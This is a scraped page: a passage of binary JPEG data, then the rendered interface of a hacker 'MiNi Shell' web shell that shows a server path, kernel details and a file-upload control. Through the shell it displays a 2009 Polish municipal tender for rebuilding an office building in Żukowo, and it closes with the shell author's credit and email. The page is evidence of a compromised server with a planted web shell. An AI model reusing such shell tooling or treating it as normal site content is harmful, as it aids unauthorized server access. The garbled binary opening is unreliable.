JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090330/83712-N-2009.html

<p class="kh_header"><b>Żukowo: Modernizacja budynku przy ulicy Gdańskiej 48 w Żukowie - zmiana sposobu użytkowania istniejącego budynku na funkcję administracyjno-biurową</b><br>
<b>Numer ogłoszenia: 83712 - 2009; data zamieszczenia: 30.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku przy ulicy Gdańskiej 48 w Żukowie - zmiana sposobu użytkowania istniejącego budynku na funkcję administracyjno-biurową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach niniejszego zamówienia przewiduje się
1.	wykonanie następujących robót rozbiórkowych: wyburzenie biegów i podestów klatki schodowej w byłej części szkolnej budynku, wyburzenie niektórych ścianek działowych , wykucie wnęki na parterze budynku w części mieszkalnej w celu poszerzenia przejścia do wymaganych 90 cm, rozbiórka istniejących posadzek do stropu budynku, poszerzenie niektórych otworów drzwiowych, rozbiórka istniejących instalacji CO, wodno-kanalizacyjnej, elektrycznej, telefonicznej i hydrantowej,
2.	wykonanie nowych biegów i podestów w klatce schodowej w części byłej szkoły, o wymiarach spocznika 150 cm x 150 cm na podstawie projektu wykonawczego,
3.	wykonanie nowych ścianek działowych zgodnie z projektem adaptacji, zamurowanie niektórych otworów drzwiowych,
4.	wykonanie nowych instalacji CO, wody, kanalizacji, elektrycznej (w tym oświetleniowej), sieci strukturalnych komputerowych, nowej instalacji hydrantowej, alarmowej i monitoringu,
5.	wykonanie instalacji wentylacji mechanicznej według opracowania branżowego w całym budynku,
6.	wykonanie nowych posadzek,
7.	wykonanie gładzi gipsowych na ścianach i sufitach pomieszczeń biurowych i klatkach schodowych oraz okładzin ceramicznych w sanitariatach,
8.	montaż nowej stolarki drzwiowej,
9.	malowanie ścian,
10.	wykonanie sufitów podwieszanych, maskujących przewody wentylacyjne,
11.	montaż armatury sanitarnej,
12.	montaż lamp oświetleniowych, czujników alarmowych, kamer do monitoringu oraz awaryjnego oświetlenia ewakuacyjnego,
13.	montaż serwera i urządzenia UPS w pomieszczeniu technicznym,
14.	wykonanie łącza światłowodowego pomiędzy budynkiem Urzędu Gminy a budynkiem do adaptacji,
15.	wykonanie na dachu budynku podstaw pod wentylatory,
16.	rozbiórka kominów wentylacyjnych nad dachem.

Charakterystyka budynku:
Powierzchnia zabudowy - 269,15 m2
Powierzchnia użytkowa - 631,00 m2
w tym: 	parter		- 209,23 m2
		I piętro		- 209,87 m2
		II piętro	- 211,90 m2
Kubatura - 3007 m3

	Zakres  zamówienia określa dokumentacja projektowa, która stanowi załącznik do niniejszej SIWZ. 
	Zamawiający dysponuje projektem budowlanym i pozwoleniem na budowę. 
	Zamawiający wymaga, aby Wykonawca zrealizował zadanie z własnych materiałów.
	Wszystkie materiały powinny posiadać atesty i certyfikaty oraz spełniać normy określone w specyfikacji technicznej wykonania i odbioru robót.
	Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, o którym mowa w art.67 ust 1 pkt 6 ustawy Prawo Zamówień Publicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.50.00-7, 45.23.23.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	dysponują osobami zapewniającymi realizację zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia , w tym kierownik budowy (1 osoba) - posiadający uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie konstrukcyjno - budowlanym bez ograniczeń, (przynależność do branżowej izby samorządu zawodowego, opłacone składki co najmniej do 31 grudnia 2009 roku),  
2) zrealizowali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (dniem publikacji ogłoszenia o zamówieniu), a jeżeli okres prowadzenia działalności gospodarczej jest krótszy, w tym okresie, co najmniej jedno zamówienie  o podobnym charakterze i złożoności porównywalnej z przedmiotem zamówienia tj. remont generalny budynku biurowego, mieszkalnego lub innego - o wartości minimum 600 000,00 PLN brutto dla danego zadania.
3)	spełniają warunki udziału w postępowaniu zgodnie z  art. 22 ust. 1 ustawy - prawo zamówień publicznych,
4) nie podlegają wykluczeniu na podstawie art. 24 ustawy - prawo zamówień publicznych.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie tych części zamówienia, których wykonanie będzie powierzone Podwykonawcom. Pod pojęciem Podwykonawca należy rozumieć osoby prawne, jednostki organizacyjne, nie posiadające osobowości prawnej, które wspólnie z Wykonawcą będą realizowały zamówienie publiczne w oparciu o stosowne umowy (zlecenia) z nim zawarte. 
3.	Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu zostanie przeprowadzona w oparciu o oświadczenia i dokumenty o których mowa w pkt. VI. Ocena Wykonawców, którzy złożą oferty i oparta będzie na zasadzie spełnia  nie spełnia w odniesieniu do wszystkich warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z OFERTĄ Wykonawcy składają niżej wymienione dokumenty:
1)	oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych (Oświadczenie nr 1); 
2)	oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu o których mowa  w art. 22 ust. 1 pkt. 1 - 3 ustawy - prawo zamówień publicznych (Oświadczenie nr 2);
3)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4)	informację na temat osób przewidzianych do realizacji zamówienia - Wykaz Kadry; 
5)	wykaz robót budowlanych zrealizowanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o podobnym charakterze złożoności porównywalnej z zakresem niniejszego zamówienia i odpowiadających przedmiotowi zamówienia - Wykaz zrealizowanych zamówień  wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie;
6)	informację o tych częściach zamówienia, które będą realizowane przez Podwykonawców - Wykaz  części  zamówienia realizowanych przez podwykonawców. 
7)	Kosztorys ofertowy.
2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust 1 pkt. 3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
	1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;  
	2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
3.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego:
1)	oferta powinna zawierać pełnomocnictwo ustanawiające pełnomocnika (lidera) do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 
2)	każdy z Wykonawców zobowiązany jest do dostarczenia dokumentów potwierdzających, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych oraz dokumentów potwierdzających dopuszczenie do obrotu prawnego.
4.	Jeżeli oferta Wykonawców tworzących konsorcjum i ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. W przypadku spółki cywilnej do oferty należy dołączyć umowę spółki cywilnej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zukowo.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy,83-330 Żukowo, ul. Gdańska 52.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 12:00, miejsce: Urząd Gminy w Żukowie, ul. Gdańska 52 pokój numer 4 ( kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com